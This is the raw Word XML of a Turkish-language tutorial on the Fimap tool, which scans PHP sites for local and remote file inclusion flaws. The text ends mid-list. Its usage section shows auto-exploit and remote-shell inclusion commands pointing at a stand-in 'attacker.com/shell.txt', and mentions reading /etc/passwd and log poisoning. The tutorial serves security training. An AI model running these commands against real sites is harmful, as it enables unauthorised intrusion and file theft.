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0FF9D" w14:textId="77777777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t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Fimap Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B0B97" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fimap</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:t xml:space="preserve">, PHP tabanlı web uygulamalarında bulunan </w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI/RFI zafiyetlerini</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:t xml:space="preserve"> otomatik olarak tarayıp sömürebilen bir Python aracıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D88CE0" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:t xml:space="preserve"> Amaç:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1523B" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:t>?page=, ?file=, ?lang= gibi parametreleri tarayarak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC67CB" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:t>Yerel dosya dahil etme (LFI) ve uzaktan dosya dahil etme (RFI) zafiyetlerini bulmak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20869FBA" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:t>Bu açıklardan yararlanarak hassas dosyaları okumak veya shell yüklemek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AA7943" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:pict w14:anchorId="144F087F">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FADF40" w14:textId="77777777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t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Ne İşe Yarar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6"/>
        <w:gridCol w:w="6676"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D598C" w:rsidRPr="002D598C" w14:paraId="5DCEC9EC" w14:textId="77777777" w:rsidTr="002D59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5360E8" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Özellik</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79B98922" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Açıklama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D598C" w:rsidRPr="002D598C" w14:paraId="1A84D424" w14:textId="77777777" w:rsidTr="002D5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54437" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔍</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> LFI/RFI testi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DB6D7E1" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:t>Hedef URL’deki parametreleri otomatik test eder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D598C" w:rsidRPr="002D598C" w14:paraId="6B400F97" w14:textId="77777777" w:rsidTr="002D5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B373A" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🧾</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> /etc/passwd okuma</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33129738" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:t>LFI açıklıklarında ilk denenen dosyalardan biri</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D598C" w:rsidRPr="002D598C" w14:paraId="51B5174E" w14:textId="77777777" w:rsidTr="002D5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3024E" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🐚</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> Shell yükleme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F9C13EB" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:t>RFI ile uzaktan PHP shell çağırabilir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D598C" w:rsidRPr="002D598C" w14:paraId="22651C96" w14:textId="77777777" w:rsidTr="002D5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BEBC5" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔐</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> Otomatik exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA0B5A4" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:t>Tespit edilen açığı otomatik sömürür</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D598C" w:rsidRPr="002D598C" w14:paraId="43A92B6F" w14:textId="77777777" w:rsidTr="002D5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66F53" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>📜</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> Log zehirleme testi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DE98BE8" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:t>access.log dosyasına PHP payload yazılıp çalıştırılır mı diye test eder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BF4073B" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:pict w14:anchorId="37059A66">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC64E54" w14:textId="77777777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t>⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Kurulum (Kali Linux / Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7DBEF" w14:textId="77777777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t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Gerekli paketler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462B88D6" w14:textId="490B03A2" w:rsidR="00F8346D" w:rsidRDefault="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46972D33" wp14:editId="30ADE514">
            <wp:extent cx="3210373" cy="1276528"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="15639407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07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263A" w14:textId="77777777" w:rsidR="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D6DFF0" w14:textId="77777777" w:rsidR="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133590CD" w14:textId="3EE77741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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Fimap’i klonla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE6AF1A" w14:textId="2A97D631" w:rsidR="002D598C" w:rsidRDefault="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E00DA10" wp14:editId="05A1A822">
            <wp:extent cx="5096586" cy="1276528"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1403144334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44334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A552" w14:textId="77777777" w:rsidR="002D598C" w:rsidRDefault="002D598C"/>
    <w:p w14:paraId="632167BB" w14:textId="77777777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t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Kullanım Komutları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139553FE" w14:textId="77777777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t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tek bir URL’de LFI test etmek:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595EEA68" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:t>python3 fimap.py -u "http://target.com/index.php?page=test"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29537EBC" w14:textId="77777777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t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Belirli bir dizin veya siteyi taramak:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA7F31" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:t>python3 fimap.py -l urls.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E5B15" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:t>urls.txt dosyası içinde test edilecek URL listesi bulunur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01791E22" w14:textId="77777777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t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Otomatik sömürü:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0DC9D3" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:t>python3 fimap.py -u "http://target.com/index.php?page=test" --exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0476EF" w14:textId="77777777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t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell yüklemeyi denemek (RFI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09942542" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:t>python3 fimap.py -u "http://target.com/index.php?page=http://attacker.com/shell.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13660CBA" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:pict w14:anchorId="398FF7C7">
          <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D02F471" w14:textId="77777777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t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Örnek Terminal Çıktısı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157B82C8" w14:textId="1957123A" w:rsidR="002D598C" w:rsidRDefault="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C6307CC" wp14:editId="69E7B015">
            <wp:extent cx="5760720" cy="1746250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="8181981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98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95FA" w14:textId="77777777" w:rsidR="002D598C" w:rsidRDefault="002D598C"/>
    <w:p w14:paraId="46D0EBEE" w14:textId="77777777" w:rsidR="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC0FF30" w14:textId="77777777" w:rsidR="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A57020C" w14:textId="57F7DC08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lastRenderedPageBreak/>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6. LFI/RFI Nedir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2D598C" w:rsidRPr="002D598C" w14:paraId="39342A8C" w14:textId="77777777" w:rsidTr="002D59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F6471A" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tür</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01126187" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Açıklama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D598C" w:rsidRPr="002D598C" w14:paraId="27A8B6C7" w14:textId="77777777" w:rsidTr="002D5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100AC" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>📂</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> LFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B939430" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve">Kullanıcının belirttiği dosya adının sunucudan </w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>yerel olarak dahil edilmesi</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> (örnek: /etc/passwd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D598C" w:rsidRPr="002D598C" w14:paraId="73734DAE" w14:textId="77777777" w:rsidTr="002D5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8B2C2" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🌍</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> RFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="476E745F" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve">Dosya dahil etme işleminin </w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>uzaktaki bir sunucudan</w:t>
            </w:r>
            <w:r w:rsidRPr="002D598C">
              <w:t xml:space="preserve"> yapılması (örnek: http://evil.com/shell.txt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2977FF01" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:r w:rsidRPr="002D598C">
        <w:t>Bu zafiyetler genellikle PHP'deki include, require, include_once gibi fonksiyonlar üzerinden oluşur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E8753" w14:textId="390ABDF0" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C"/>
    <w:p w14:paraId="401A83AC" w14:textId="77777777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t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 7. Fimap Özellikleri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A3586" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🔎</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:t xml:space="preserve"> Derinlikli dizin taraması</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58243FED" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📁</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:t xml:space="preserve"> Log poisoning kontrolü</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B556AC" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:t xml:space="preserve"> Config dosyalarını okuma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CAA35B" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>💣</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:t xml:space="preserve"> Exploit mod (otomatik)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE9AD9C" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📄</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:t xml:space="preserve"> Dökümantasyon çıktısı alma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB5F217" w14:textId="6C25706F" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C"/>
    <w:p w14:paraId="7F21A915" w14:textId="755C9583" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="002D598C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Öğrenim Kazanımları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49607B05" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:t>LFI/RFI açıklıklarını tespit etme ve sömürme pratiği</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155C5A57" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002D598C">
        <w:t>Dosya dahil etme zafiyetlerinin ne kadar tehlikeli olduğunu öğrenme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1302882F" w14:textId="77777777" w:rsidR="002D598C" w:rsidRPr="002D598C" w:rsidRDefault="002D598C" w:rsidP="002D598C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
